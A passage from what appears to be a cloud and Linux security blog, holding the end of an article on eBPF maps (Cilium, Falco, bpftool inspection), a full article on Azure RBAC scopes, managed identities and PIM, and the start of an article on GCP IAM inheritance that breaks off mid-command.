Cilium’s connection tracking map is LRU-bounded at 65,536 entries. On a node handling high-connection-rate workloads, this can fill up. When it does, Cilium starts evicting old connections to make room for new ones — and if it’s evicting too aggressively, you’ll see connection resets.

# Check current CT map usage vs its limit
bpftool map show id 12
# max_entries tells you the ceiling
# count entries to see current usage
bpftool map dump id 12 | grep -c "^key"

Size LRU maps at 2× your expected concurrent active entries. Aggressive eviction under pressure introduces gaps — not crashes, but missing or incorrect state.

Where you see them: connection tracking, process lineage, anything where the key space is dynamic and unbounded.

Ring Buffers

Ring buffers are how eBPF tools stream events from the kernel to a userspace consumer. Falco reads syscall events from a ring buffer. Tetragon streams process execution and network events through ring buffers. The pattern is the same across all of them:

kernel eBPF program
  → sees event (syscall, network packet, process exec)
  → writes record to ring buffer
  → userspace tool reads it and processes (Falco rules, Tetragon policies)

What makes ring buffers the right primitive for event streaming:

  • Single buffer shared across all CPUs — unlike the older perf_event_array approach which required one buffer per CPU, a ring buffer is one allocation, one file descriptor, one consumer
  • Lock-free — the kernel writes, the userspace tool reads, they don’t block each other
  • Backpressure when full — if the userspace tool can’t keep up, new events are dropped rather than queued indefinitely. The tool can detect and count drops. Falco reports these as Dropped events in its stats output.
# Falco's ring buffer — 8MB
bpftool map list | grep ringbuf
# ID 28: ringbuf  name falco_events  max_entries 8388608

8,388,608 bytes = 8MB. That’s the buffer between Falco’s kernel hooks and its rule engine. If there’s a burst of syscall activity and Falco’s rule evaluation can’t keep up, events drop into that window and are lost.

Sizing matters operationally. Too small and you drop events during normal burst. Too large and you’re holding non-pageable kernel memory that doesn’t show up in standard memory metrics.

# Check Falco's drop rate
falcoctl stats
# or check the Falco logs
journalctl -u falco | grep -i "drop"

Most production deployments run 8–32MB. Start at 8MB, monitor drop rates under load, size up if needed.

Where you see them: Falco event streaming, Tetragon audit events, any tool that needs to move high-volume event data from kernel to userspace.

Array Maps

Array maps are fixed-size, integer-indexed, and entirely pre-allocated at creation time. Think of them as lookup tables with integer keys — constant-time access, no hash overhead, no dynamic allocation.

Cilium uses array maps for policy configuration: a fixed set of slots indexed by endpoint identity number. When a packet arrives and Cilium needs to check policy, it indexes into the array directly rather than doing a hash lookup. For read-heavy, write-rare data, this is faster.

The constraint: you can’t delete entries from an array map. Every slot exists for the lifetime of the map. If you need to track state that comes and goes — connections, processes, pods — use a hash map instead.

Where you see them: policy configuration, routing tables with fixed indices, per-CPU stats indexed by CPU number.

LPM Trie Maps

LPM (Longest Prefix Match) trie maps handle IP prefix lookups — the same operation that a hardware router does when deciding which interface to send a packet out of.

You can store a mix of specific host addresses (/32) and CIDR ranges (/16, /24) in the same map, and a lookup returns the most specific match. If 10.0.1.15/32 and 10.0.0.0/8 are both in the map, a lookup for 10.0.1.15 returns the /32 entry.

Cilium’s cilium_ipcache map is an LPM trie. It maps every IP in the cluster to its security identity — the identifier Cilium uses for policy enforcement. When a packet arrives, Cilium does a trie lookup on the source IP to find out which endpoint sent it, then checks policy against that identity.

# Inspect the ipcache map
bpftool map show id 13
# lpm_trie  name cilium_ipcache  key 40B  value 32B  max_entries 512000

# Look up which security identity owns a pod IP
bpftool map lookup id 13 key hex 20 00 00 00 0a 00 01 0f 00 00 00 00 00 00 00 00 00 00 00 00

Where you see them: IP-to-identity mapping (Cilium), CIDR-based policy enforcement, IP blocklists.


Pinned Maps — State That Survives Restarts

By default, a map’s lifetime is tied to the tool that created it. When the tool exits, the kernel garbage-collects the map.

Pinning writes a reference to the BPF filesystem at /sys/fs/bpf, which keeps the map alive even after the creating process exits:

# See all maps Cilium has pinned
ls /sys/fs/bpf/tc/globals/
# cilium_ct4_global  cilium_ipcache  cilium_metrics  cilium_policy ...

# Inspect a pinned map directly — no Cilium process needed
bpftool map dump pinned /sys/fs/bpf/tc/globals/cilium_ct4_global

# Pin any map by ID for manual inspection
bpftool map pin id 12 /sys/fs/bpf/my_conn_tracker
bpftool map dump pinned /sys/fs/bpf/my_conn_tracker

Cilium pins all its maps under /sys/fs/bpf/tc/globals/. When Cilium restarts — rolling upgrade, crash, OOM kill — it reopens its pinned maps and resumes with existing state intact. Pods maintain established TCP connections through a Cilium restart without disruption.

This is operationally significant: if you’re evaluating eBPF-based tools for production, check whether they pin their maps. A tool that doesn’t loses all its tracked state on every restart — connection tracking resets, process lineage gaps, policy state rebuilt from scratch.


Map Memory: A Production Consideration

Map memory is kernel-locked — it cannot be paged out, and it doesn’t show up in standard memory pressure metrics. Your node’s free output and container memory limits don’t account for it.

# Total eBPF map memory locked on this node
bpftool map list -j | python3 -c "
import json,sys
maps=json.load(sys.stdin)
total=sum(m.get('bytes_memlock',0) for m in maps)
print(f'Total map memory: {total/1024/1024:.1f} MB')
"

# Check system memlock limit (unlimited is correct for eBPF tools)
ulimit -l

# Check what Cilium's systemd unit sets
systemctl show cilium | grep -i memlock

On a node running Cilium + Falco + Datadog NPM, I’ve seen 200–400MB of map memory locked. That’s real, non-pageable kernel memory. If you’re sizing nodes for eBPF-heavy workloads, account for this separately from your pod workload memory.

If an eBPF tool fails to load with a permission error despite having enough free memory, the root cause is usually the memlock ulimit for the process. Cilium, Falco, and most production tools set LimitMEMLOCK=infinity in their systemd units. Verify this if you’re deploying a new eBPF-based tool and seeing unexpected load failures.


Inspecting Maps in Production

# List all maps: type, name, key/value sizes, memory usage
bpftool map list

# Dump all entries in a map (careful with large maps)
bpftool map dump id 12

# Look up a specific entry by key
bpftool map lookup id 12 key hex 0a 00 01 0f 00 00 00 00

# Watch map stats live
watch -n1 'bpftool map show id 12'

# See all maps for a specific tool by checking its pinned path
ls /sys/fs/bpf/tc/globals/                    # Cilium
ls /sys/fs/bpf/falco/                         # Falco (if pinned)

# Cross-reference map IDs with the programs using them
bpftool prog list
bpftool map list

⚠ Production Gotchas

A full LRU map drops state silently, not loudly
When Cilium’s CT map fills up, it starts evicting the least recently used connections — not returning an error. You see connection resets, not a tool alert. Check map utilisation (bpftool map dump id X | grep -c key) against max_entries on nodes with high connection rates.

Ring buffer drops don’t stop the tool — they create gaps
When Falco’s ring buffer fills up, events are dropped. Falco keeps running. The rule engine keeps processing. But you have gaps in your syscall visibility. Monitor Dropped events in Falco’s stats and size the ring buffer accordingly.

Map memory is invisible to standard monitoring
200–400MB of kernel-locked memory on a Cilium + Falco node doesn’t appear in top, container memory metrics, or memory pressure alerts. Size eBPF-heavy nodes with this in mind and add explicit map memory monitoring via bpftool.

Tools that don’t pin their maps lose state on restart
A Cilium restart with pinned maps = zero-disruption connection tracking. A tool without pinning = all tracked state rebuilt from scratch. This matters for connection tracking tools and any tool maintaining process lineage.

perf_event_array on kernel 5.8+ is the old way
Older eBPF tools use per-CPU perf_event_array for event streaming. Ring buffer is strictly better — single allocation, lower overhead, simpler consumption. If you’re running a tool that still uses perf_event_array on a 5.8+ kernel, it’s using a legacy path.


Key Takeaways

  • eBPF programs are stateless — maps are where all state lives, between invocations and between kernel and userspace
  • Every production eBPF tool (Cilium, Falco, Tetragon, Datadog NPM) is a map-based architecture — bpftool map list shows you what it’s actually holding
  • Per-CPU maps eliminate write contention for high-frequency counters; the tool aggregates per-CPU values at export time
  • LRU maps handle unbounded key spaces (IPs, PIDs, connections) without hard errors when full — but eviction is silent, so size generously
  • Ring buffer (kernel 5.8+) is the correct event streaming primitive — Falco and Tetragon both use it
  • Map memory is kernel-locked and invisible to standard memory metrics — account for it explicitly on eBPF-heavy nodes
  • Pinned maps survive restarts; Cilium uses this for zero-disruption connection tracking through upgrades

What’s Next

You know what program types run in the kernel, and you know how they hold state.

Get EP06 in your inbox when it publishes → linuxcent.com/subscribe But there’s a problem anyone running eBPF-based tools eventually runs into: a tool works on one kernel version and breaks on the next. Struct layouts shift between patch versions. Field offsets move. EP06 covers CO-RE (Compile Once, Run Everywhere) and libbpf — the mechanism that makes tools like Cilium and Falco survive your node upgrades without recompilation, and why kernel version compatibility is a solved problem for any tool built on this toolchain.

Azure RBAC Explained: Management Groups, Subscriptions, and Scope

Reading Time: 11 minutes

Meta Description: Understand Azure RBAC scopes across management groups, subscriptions, and resources — assign roles at the right level without over-provisioning access.
What Is Cloud IAMAuthentication vs AuthorizationIAM Roles vs PoliciesAWS IAM Deep DiveGCP Resource Hierarchy IAMAzure RBAC Scopes


TL;DR

  • Entra ID and Azure RBAC are two separate authorization planes — Entra ID roles control the identity system; RBAC roles control Azure resources. Global Administrator doesn’t grant VM access.
  • Azure RBAC role assignments inherit downward through the hierarchy: Management Group → Subscription → Resource Group → Resource
  • Use managed identities for all Azure-hosted workloads — system-assigned for one-to-one resource binding, user-assigned for shared access across multiple resources
  • Contributor is the right role for most service identities — full resource management without the ability to modify RBAC assignments
  • The Actions vs DataActions split means you can audit management access and data access independently — an incomplete audit checks only one
  • PIM (Privileged Identity Management) should govern all Entra ID privileged roles — nobody should permanently hold Global Admin or Subscription Owner

The Big Picture

         Azure: Two Separate Authorization Planes
─────────────────────────────────────────────────────────
  Entra ID (Identity Plane)      Azure RBAC (Resource Plane)
  ─────────────────────────      ───────────────────────────
  Controls:                      Controls:
  · Users, groups, apps          · Azure resources
  · Tenant settings              · Management groups
  · App registrations            · Subscriptions
  · Conditional access           · Resource groups
                                 · Individual resources

  Roles (examples):              Scope hierarchy:
  · Global Administrator         Management Group
  · User Administrator             └─ Subscription
  · Security Reader                     └─ Resource Group
  · Application Administrator                └─ Resource

  Scope: tenant-wide             Role assignment at any level
                                 inherits down to all nodes below

  Both planes use Entra ID identities.
  Authorization in each plane is completely independent.
  Global Admin ≠ Subscription Owner.

Azure RBAC scopes determine how far a role assignment reaches — and the blast radius of a misconfiguration scales directly with how high in the hierarchy it sits.


Introduction

Azure RBAC scopes define where a role assignment applies and everything it inherits. A role at the Management Group level touches every subscription, every resource group, and every resource across your entire Azure estate. A role at the resource level touches only that resource. Understanding scope before making any assignment is the difference between “access for this storage account” and “access for your entire org.”

When I first worked seriously in Azure environments, I had a mental model carried over from Active Directory administration. Users, groups, directory roles — I knew how that worked. I assumed Azure’s IAM would be an extension of the same system, just with cloud resources bolted on.

That assumption got me into trouble within the first week.

I was trying to understand why an engineer had Global Administrator access in Entra ID but couldn’t see the resources in a Subscription. In Active Directory terms, if you’re a Domain Admin, you can see everything. In Azure, it doesn’t work that way.

Entra ID roles and Azure RBAC roles are two different systems. Global Administrator is an Entra ID role — it controls who can manage the identity plane: create users, manage app registrations, configure tenant settings. It has nothing to do with Azure resources like virtual machines, storage accounts, or Kubernetes clusters. Those are governed by Azure RBAC, which is an entirely separate authorization system.

I spent two hours trying to understand why a Global Admin couldn’t list VMs before someone explained this. I’m putting it at the top of this episode so you don’t lose those two hours.


Entra ID vs Azure RBAC — The Two Separate Planes

Entra ID Azure RBAC
Controls access to Entra ID itself — users, groups, apps, tenant settings Azure resources — VMs, storage, databases, subscriptions
Role types Entra ID directory roles Azure resource roles
Example roles Global Admin, User Admin, Security Reader Owner, Contributor, Storage Blob Data Reader
Scope Tenant-wide Management group → Subscription → Resource Group → Resource
Managed via Entra ID admin center Azure portal / ARM / Azure CLI

A user can be Global Administrator — the highest Entra ID role — and have zero access to Azure resources unless explicitly assigned an Azure RBAC role. And vice versa: a user with Subscription Owner (highest Azure RBAC role) has no ability to manage Entra ID user accounts without an Entra ID role assignment.

These are not the same system. They’re connected — both use Entra ID identities as principals — but authorization in each plane is independent.


The Azure Resource Hierarchy

Azure RBAC role assignments can be made at any level of the resource hierarchy, and they inherit downward:

Tenant (Entra ID)
  └── Management Group  (policy and RBAC inheritance across subscriptions)
        └── Management Group  (nested, up to 6 levels)
              └── Subscription  (billing and resource boundary)
                    └── Resource Group  (logical container for resources)
                          └── Resource  (VM, storage account, key vault, AKS cluster...)

A role assigned at the Subscription level applies to every resource group and resource in that subscription. A role at the Management Group level applies to every subscription beneath it.

The blast radius of a misconfiguration scales with how high in the hierarchy it sits. Subscription Owner at the subscription level is contained to that subscription. Management Group Contributor at the root management group touches your entire Azure estate.

# View management group hierarchy
az account management-group list --output table

# List subscriptions
az account list --output table

# View all role assignments at a scope — start here in any audit
az role assignment list \
  --scope /subscriptions/SUB_ID \
  --include-inherited \
  --output table

Principal Types in Azure RBAC

Type What It Is Best For
User Entra ID user account Human access
Group Entra ID security group Team-based access
Service Principal App registration with credentials (secret or cert) External systems, apps with their own identity
Managed Identity Credential-less identity for Azure-hosted workloads Everything running in Azure

Managed Identities — The Right Model for Workloads

Managed identities are Azure’s answer to AWS instance profiles and GCP service accounts attached to compute. Azure manages the entire credential lifecycle — tokens are issued automatically, there’s nothing to create, rotate, or revoke manually.

System-assigned managed identity is tied to a specific Azure resource. When the resource is deleted, the identity is deleted. One-to-one, no sharing.

# Enable system-assigned managed identity on a VM
az vm identity assign \
  --name my-vm \
  --resource-group rg-prod

# Get the principal ID (needed to assign RBAC roles to it)
az vm show \
  --name my-vm \
  --resource-group rg-prod \
  --query identity.principalId \
  --output tsv

User-assigned managed identity is a standalone resource that can be attached to multiple Azure resources and persists independently. This is the right model when multiple services need the same access — instead of assigning the same RBAC roles to ten separate system-assigned identities, you create one user-assigned identity, grant it the roles, and attach it to all ten resources.

# Create a user-assigned managed identity
az identity create \
  --name app-backend-identity \
  --resource-group rg-identities

# Get its identifiers
az identity show \
  --name app-backend-identity \
  --resource-group rg-identities \
  --query '{principalId:principalId, clientId:clientId}'

# Attach to a VM
az vm identity assign \
  --name my-vm \
  --resource-group rg-prod \
  --identities /subscriptions/SUB/resourceGroups/rg-identities/providers/Microsoft.ManagedIdentity/userAssignedIdentities/app-backend-identity

Code running inside an Azure VM or App Service with a managed identity gets tokens via IMDS, with no credential management required:

from azure.identity import DefaultAzureCredential
from azure.storage.blob import BlobServiceClient

# DefaultAzureCredential automatically picks up the managed identity in Azure
credential = DefaultAzureCredential()
client = BlobServiceClient(
    account_url="https://myaccount.blob.core.windows.net",
    credential=credential
)

The DefaultAzureCredential chain: managed identity → environment variables → workload identity → Visual Studio / VS Code authentication → Azure CLI. In Azure-hosted services, the managed identity path is used automatically. In local development, it falls through to the developer’s az login session.


Azure Role Definitions — Understanding Actions vs DataActions

A role definition specifies what actions it grants. Azure distinguishes two planes:

  • Actions: Control plane — managing the resource itself (create, delete, configure)
  • DataActions: Data plane — accessing data within the resource (read blob contents, get secrets)
  • NotActions / NotDataActions: Exceptions carved out from the grant
{
  "Name": "Storage Blob Data Reader",
  "IsCustom": false,
  "Actions": [
    "Microsoft.Storage/storageAccounts/blobServices/containers/read",
    "Microsoft.Storage/storageAccounts/blobServices/generateUserDelegationKey/action"
  ],
  "NotActions": [],
  "DataActions": [
    "Microsoft.Storage/storageAccounts/blobServices/containers/blobs/read"
  ],
  "NotDataActions": [],
  "AssignableScopes": ["/"]
}

The control/data plane split matters in audits. An identity with Microsoft.Storage/storageAccounts/read (an Action) can see the storage account exists and view its properties. To actually read blob contents, it needs the DataAction Microsoft.Storage/storageAccounts/blobServices/containers/blobs/read. These are separate grants. In an access audit, checking only Actions and missing DataActions is an incomplete picture.

Built-in Roles Worth Understanding

Role Scope What It Grants
Owner Any Full access + can manage RBAC assignments — the highest trust role
Contributor Any Full resource management, but cannot manage RBAC
Reader Any Read-only on all resources
User Access Administrator Any Can manage RBAC assignments, no resource access
Storage Blob Data Contributor Storage Read/write/delete blob data
Storage Blob Data Reader Storage Read blob data only
Key Vault Secrets Officer Key Vault Manage secrets, not keys or certificates
AcrPush / AcrPull Container Registry Push or pull images

The gap between Owner and Contributor is important: Contributor can do everything to a resource except manage who has access to it. This is the right role for most service identities and automation — they need to manage resources, not manage permissions. If a compromised Contributor identity can’t modify RBAC assignments, it can’t grant itself or an attacker additional access.

Owner should be granted to people, not service identities, and only at the narrowest scope necessary.

Custom Roles

cat > custom-app-storage.json << 'EOF'
{
  "Name": "App Storage Blob Reader",
  "IsCustom": true,
  "Description": "Read app blobs only — no container management, no key operations",
  "Actions": [
    "Microsoft.Storage/storageAccounts/blobServices/containers/read"
  ],
  "DataActions": [
    "Microsoft.Storage/storageAccounts/blobServices/containers/blobs/read"
  ],
  "NotActions": [],
  "NotDataActions": [],
  "AssignableScopes": ["/subscriptions/SUB_ID"]
}
EOF

az role definition create --role-definition custom-app-storage.json

# Assign it — specifically to this storage account
az role assignment create \
  --assignee-object-id "$(az identity show --name app-backend-identity -g rg-identities --query principalId -o tsv)" \
  --assignee-principal-type ServicePrincipal \
  --role "App Storage Blob Reader" \
  --scope /subscriptions/SUB_ID/resourceGroups/rg-prod/providers/Microsoft.Storage/storageAccounts/appstore

Role Assignments — Where Access Is Actually Granted

The assignment brings everything together: principal + role + scope. This is the actual grant.

# Assign to a user (less common — prefer group assignments)
az role assignment create \
  --assignee [email protected] \
  --role "Storage Blob Data Reader" \
  --scope /subscriptions/SUB_ID/resourceGroups/rg-prod/providers/Microsoft.Storage/storageAccounts/prodstore

# Assign to a group (better — one assignment, maintained via group membership)
GROUP_ID=$(az ad group show --group "Backend-Team" --query id -o tsv)
az role assignment create \
  --assignee-object-id "$GROUP_ID" \
  --assignee-principal-type Group \
  --role "Contributor" \
  --scope /subscriptions/SUB_ID/resourceGroups/rg-dev

# Assign to a managed identity
MI_PRINCIPAL=$(az identity show --name app-backend-identity --resource-group rg-identities --query principalId -o tsv)
az role assignment create \
  --assignee-object-id "$MI_PRINCIPAL" \
  --assignee-principal-type ServicePrincipal \
  --role "Storage Blob Data Contributor" \
  --scope /subscriptions/SUB_ID/resourceGroups/rg-prod/providers/Microsoft.Storage/storageAccounts/appstore

# Audit all assignments at and below a scope (including inherited)
az role assignment list \
  --scope /subscriptions/SUB_ID/resourceGroups/rg-prod \
  --include-inherited \
  --output table

Group-based assignments are the right model for humans at scale. When an engineer joins the Backend team, they join the Entra ID group. Their access follows. When they leave, you remove them from the group or disable their account. You never need to hunt down individual role assignments.


Entra ID Roles — The Other Layer

Entra ID roles control the identity infrastructure itself. These are distinct from Azure RBAC roles and deserve separate treatment:

Role What It Controls
Global Administrator Everything in the tenant — highest privilege
Privileged Role Administrator Assign and remove Entra ID roles
User Administrator Create and manage users and groups
Application Administrator Register and manage app registrations
Security Administrator Manage security features and read reports
Security Reader Read-only on security features

Global Administrator in Entra ID is one of the most powerful identities in a Microsoft environment. It can modify any user, any app registration, any conditional access policy. Combined with the fact that Entra ID is also the identity provider for Microsoft 365, a Global Admin compromise can extend far beyond Azure resources into email, Teams, SharePoint — the entire Microsoft 365 estate.

Nobody should hold Global Administrator as a permanent assignment. This is where Privileged Identity Management (PIM) matters.

Privileged Identity Management — Just-in-Time Elevated Access

PIM is Azure’s answer to the problem of permanent privileged role assignments. Instead of permanently holding Global Admin or Subscription Owner, users are made eligible for these roles. When they need elevated access, they activate it with a justification (and optionally an approval and MFA requirement). The access is time-limited — typically 8 hours — and automatically expires.

# List roles where the user is eligible (not permanently assigned)
az rest --method GET \
  --uri "https://graph.microsoft.com/v1.0/roleManagement/directory/roleEligibilitySchedules" \
  --query "value[?principalId=='USER_OBJECT_ID']"

# A user activates an eligible role (calls this themselves when needed)
az rest --method POST \
  --uri "https://graph.microsoft.com/v1.0/roleManagement/directory/roleAssignmentScheduleRequests" \
  --body '{
    "action": "selfActivate",
    "principalId": "USER_OBJECT_ID",
    "roleDefinitionId": "ROLE_DEF_ID",
    "directoryScopeId": "/",
    "justification": "Investigating security alert in tenant audit logs",
    "scheduleInfo": {
      "startDateTime": "2026-04-16T00:00:00Z",
      "expiration": { "type": "AfterDuration", "duration": "PT8H" }
    }
  }'

PIM is the right model for any role that could be used to escalate privileges: Global Administrator, Subscription Owner, Privileged Role Administrator, User Access Administrator. Nobody should have these permanently assigned unless there’s a strong operational reason — and even then, the assignment should be reviewed quarterly.

In one Azure environment I audited, I found 11 permanent Global Administrator assignments. The team thought this was normal because they’d all been made admins when the tenant was set up two years earlier and nobody had revisited it. Of the 11, three were former employees whose Entra ID accounts had been disabled — but the Global Admin role assignment was still there. Disabled users can’t use their accounts, but this is not a pattern you want to rely on.


Federated Identity for External Workloads

For GitHub Actions, Kubernetes workloads, and other external systems that need to call Azure APIs, federated credentials eliminate service principal secrets:

# Create an app registration
APP_ID=$(az ad app create --display-name "github-actions-deploy" --query appId -o tsv)
SP_ID=$(az ad sp create --id "$APP_ID" --query id -o tsv)

# Add a federated credential for a specific GitHub repo and branch
az ad app federated-credential create \
  --id "$APP_ID" \
  --parameters '{
    "name": "github-main-branch",
    "issuer": "https://token.actions.githubusercontent.com",
    "subject": "repo:my-org/my-repo:ref:refs/heads/main",
    "audiences": ["api://AzureADTokenExchange"]
  }'

# Grant the service principal an RBAC role
az role assignment create \
  --assignee-object-id "$SP_ID" \
  --role "Contributor" \
  --scope /subscriptions/SUB_ID/resourceGroups/rg-prod

GitHub Actions — no secrets stored in GitHub:

jobs:
  deploy:
    permissions:
      id-token: write   # required for OIDC token request
    steps:
      - uses: azure/login@v2
        with:
          client-id: ${{ secrets.AZURE_CLIENT_ID }}
          tenant-id: ${{ secrets.AZURE_TENANT_ID }}
          subscription-id: ${{ secrets.AZURE_SUBSCRIPTION_ID }}
      - run: az storage blob upload --account-name prodstore ...

The client-id, tenant-id, and subscription-id values are not secrets — they’re identifiers. The actual authentication is the OIDC JWT from GitHub, verified against GitHub’s public keys, subject-matched against the configured condition (repo:my-org/my-repo:ref:refs/heads/main). If the repo or branch doesn’t match, the token exchange fails. If it matches, a short-lived Azure token is issued.


⚠ Production Gotchas

Global Admin ≠ Azure resource access
This trips up every team migrating from on-prem AD. Entra ID roles and Azure RBAC roles are independent systems. A Global Admin with no RBAC assignments cannot list VMs. Don’t assume directory privilege translates to resource access.

Permanent Global Admin assignments are a standing breach risk
In the environment I audited: 11 permanent Global Admins, three of them disabled accounts. Disabled accounts can’t authenticate, but relying on that is not a security control. PIM eligible assignments + regular access reviews is the right answer.

Owner on service identities lets compromised workloads modify RBAC
If a managed identity or service principal holds Owner, a compromised workload can grant additional permissions to itself or an attacker. Use Contributor for workloads — full resource management, no RBAC modification.

Checking only Actions misses data-plane access
An audit that enumerates role Actions and ignores DataActions will miss identities with read access to blob contents, Key Vault secrets, or database records. Both planes need to be in scope.

System-assigned identity is deleted with the resource
If you delete and recreate a VM using a system-assigned identity, the new identity is different. Any RBAC assignments made to the old identity are gone. User-assigned identities persist independently — use them for workloads where the resource lifecycle is separate from the identity lifecycle.


Quick Reference

# Audit all role assignments at a subscription (including inherited)
az role assignment list \
  --scope /subscriptions/SUB_ID \
  --include-inherited \
  --output table

# Find all Owner assignments at subscription scope
az role assignment list \
  --scope /subscriptions/SUB_ID \
  --role Owner \
  --output table

# Get principal ID of a VM's managed identity
az vm show \
  --name my-vm \
  --resource-group rg-prod \
  --query identity.principalId \
  --output tsv

# View role definition — check Actions AND DataActions
az role definition list --name "Storage Blob Data Reader" --output json \
  | jq '.[0] | {Actions: .permissions[0].actions, DataActions: .permissions[0].dataActions}'

# List management group hierarchy
az account management-group list --output table

# Create user-assigned managed identity
az identity create --name app-identity --resource-group rg-identities

# Assign role to managed identity at resource scope
az role assignment create \
  --assignee-object-id "$(az identity show -n app-identity -g rg-identities --query principalId -o tsv)" \
  --assignee-principal-type ServicePrincipal \
  --role "Storage Blob Data Contributor" \
  --scope /subscriptions/SUB_ID/resourceGroups/rg-prod/providers/Microsoft.Storage/storageAccounts/mystore

# Check PIM eligible roles for a user
az rest --method GET \
  --uri "https://graph.microsoft.com/v1.0/roleManagement/directory/roleEligibilitySchedules" \
  --query "value[?principalId=='USER_OBJECT_ID'].{role:roleDefinitionId,scope:directoryScopeId}"

Framework Alignment

Framework Reference What It Covers Here
CISSP Domain 5 — Identity and Access Management Azure’s directory-centric model; managed identities and PIM are the primary IAM constructs
CISSP Domain 3 — Security Architecture Entra ID spans Azure, M365, and third-party SaaS — scope boundaries determine the blast radius of a compromise
ISO 27001:2022 5.15 Access control Azure RBAC role definitions and assignments implement access control policy
ISO 27001:2022 5.16 Identity management Entra ID is the identity management platform — user lifecycle, group management, application registrations
ISO 27001:2022 8.2 Privileged access rights PIM (Privileged Identity Management) directly implements JIT controls for privileged roles
ISO 27001:2022 5.18 Access rights Role assignment scoping, managed identity provisioning, federated credential lifecycle
SOC 2 CC6.1 Managed identities and RBAC are the primary technical controls for CC6.1 in Azure-hosted environments
SOC 2 CC6.3 PIM activation expiry and access reviews directly satisfy time-bound access removal requirements

Key Takeaways

  • Entra ID and Azure RBAC are separate authorization planes — Entra ID roles control the identity system; RBAC roles control Azure resources. Global Administrator doesn’t grant VM access.
  • Use managed identities for all Azure-hosted workloads — system-assigned for one-to-one, user-assigned for shared identities across multiple resources
  • Contributor is the right role for most service identities — full resource management without RBAC modification ability
  • The control/data plane split (Actions vs DataActions) in role definitions means you can grant management access without data access or vice versa — use this
  • PIM should govern all Entra ID privileged roles and high-scope Azure roles — nobody should permanently hold Global Admin or Subscription Owner
  • Federated identity credentials replace service principal secrets for external workloads — no secrets stored in CI/CD systems

What’s Next

EP07 goes cross-cloud: workload identity federation — the shift away from static credentials entirely, with IRSA for EKS, GKE Workload Identity, AKS workload identity, and GitHub Actions-to-all-three-clouds patterns.

Next: OIDC Workload Identity — Eliminate Cloud Access Keys Entirely.

Get EP07 in your inbox when it publishes → subscribe

GCP IAM Policy Inheritance: How the Resource Hierarchy Controls Access

Reading Time: 11 minutes

Meta Description: Map how GCP resource hierarchy IAM inheritance works — design org-level policies that don’t accidentally grant access to resources lower in the tree.
What Is Cloud IAMAuthentication vs AuthorizationIAM Roles vs PoliciesAWS IAM Deep DiveGCP Resource Hierarchy IAMAzure RBAC Scopes


TL;DR

  • GCP IAM bindings inherit downward — a binding at Organization or Folder level applies to every project and resource beneath it
  • Basic roles (viewer/editor/owner) are legacy constructs; use predefined or custom roles in production
  • Service account keys are a long-lived credential antipattern — use ADC, impersonation, or Workload Identity Federation instead
  • allAuthenticatedUsers bindings expose resources to any of 3 billion Google accounts — audit for these in every environment
  • iam.serviceAccounts.actAs is the GCP equivalent of AWS iam:PassRole — a direct privilege escalation vector
  • Conditional bindings with time-bound expiry eliminate “I’ll remember to remove this” as an operational pattern

The Big Picture

                GCP IAM Inheritance Model
─────────────────────────────────────────────────────────
Organization (company.com)
│
├─ IAM binding at Org level ──────────────────┐
│                                             │ inherits down
├── Folder: Production                        ▼
│   │                                 ALL nodes below
│   ├── Folder: Shared-Services
│   │       └── Project: infra-core
│   │               ├── GCS: config-bucket  ← affected
│   │               └── Secret Manager      ← affected
│   │
│   └── Project: prod-web-app
│           ├── GCS: prod-assets             ← affected
│           ├── Cloud SQL: prod-db           ← affected
│           └── BigQuery: analytics          ← affected
│
└── Folder: Development                      ← NOT affected by
        └── Project: dev-app                    Production binding

GCP resource hierarchy IAM inheritance is the mechanism that makes a single binding cascade through an entire estate. It’s also the reason high-level bindings carry far more blast radius than they appear to.


Introduction

GCP resource hierarchy IAM operates on one rule: bindings propagate downward. Grant access at the Organization level and it applies to every Folder, every Project, and every resource in your GCP estate. Grant it at a Folder and it applies to every Project below. This is by design — and it’s the reason IAM misconfigurations in GCP can have a blast radius that teams migrating from AWS don’t anticipate.

I once inherited a GCP environment where the previous team had taken what they thought was a shortcut. They had a folder called Production with twelve projects in it. Rather than grant developers access to each project individually, they bound roles/editor at the folder level. One binding, twelve projects, all covered. Fast.

When I audited what roles/editor on that folder actually meant, I found it gave every developer in that binding write access to Cloud SQL databases they’d never heard of, BigQuery datasets from other teams, Pub/Sub topics in shared services, and Cloud Storage buckets that held data exports. Not because anyone intended that. Because permissions in GCP flow downward through the hierarchy, and a broad role at a high level means a broad role everywhere below it.

The developer who made that binding understood “Editor means edit access.” They didn’t think through what “edit access at the folder level” means across twelve projects. This is the GCP IAM trap that catches teams coming from AWS: the hierarchy feels like an organizational convenience feature, not an access control mechanism. It’s both.


The Resource Hierarchy — Not Just Org Structure

GCP’s resource hierarchy is the backbone of its IAM model:

Organization  (e.g., company.com)
  └── Folder  (e.g., Production, Development, Shared-Services)
        └── Folder  (nested, optional — up to 10 levels)
              └── Project  (unit of resource ownership and billing)
                    └── Resource  (GCE instance, GCS bucket, Cloud SQL, BigQuery, etc.)

The critical rule: IAM bindings at any level inherit downward to every node below.

Org IAM binding:
  [email protected] → roles/viewer (org-level)
    ↓ inherited by
  Folder: Production
    ↓ inherited by
  Project: prod-web-app
    ↓ inherited by
  GCS bucket "prod-assets"

Result: alice can list and read resources across the ENTIRE org,
        across every folder, every project, every resource.
        Even if none of those resources have a direct binding for alice.

roles/viewer at the org level sounds benign — it’s just read access. But read access to everything in the organization, including infrastructure configurations, customer data exports in GCS, BigQuery analytics, Cloud SQL connection details, and Kubernetes cluster configs. Not benign.

Before making any binding above the project level, trace it down. Ask: what does this role grant, and at every project and resource below this folder, am I comfortable with that?

# Understand your org structure before making changes
gcloud organizations list

gcloud resource-manager folders list --organization=ORG_ID

gcloud projects list --filter="parent.id=FOLDER_ID"

# See all existing bindings at the org level — do this regularly
gcloud organizations get-iam-policy ORG_ID --format=json | jq '.bindings[]'

Member Types — Who Can Hold a Binding

GCP uses the term member (being renamed to principal) for the identity in a binding:

Member Type Format Notes
Google Account user:[email protected] Individual Google/Workspace account
Service Account serviceAccount:[email protected] Machine identity
Google Group group:[email protected] Workspace group
Workspace Domain domain:company.com All users in a Workspace domain
All Authenticated allAuthenticatedUsers Any authenticated Google identity — extremely broad
All Users allUsers Anonymous + authenticated — public access
Workload Identity principal://iam.googleapis.com/... External workloads via WIF

The ones that have caused data exposure incidents: allAuthenticatedUsers and allUsers. Any GCS bucket or GCP resource bound to allAuthenticatedUsers is accessible to any of the ~3 billion Google accounts in existence. I have seen production customer data exposed this way. A developer testing a public CDN pattern applied the binding to the wrong bucket.

Audit for these regularly:

# Find any project-level binding with allUsers or allAuthenticatedUsers
gcloud projects get-iam-policy my-project --format=json \
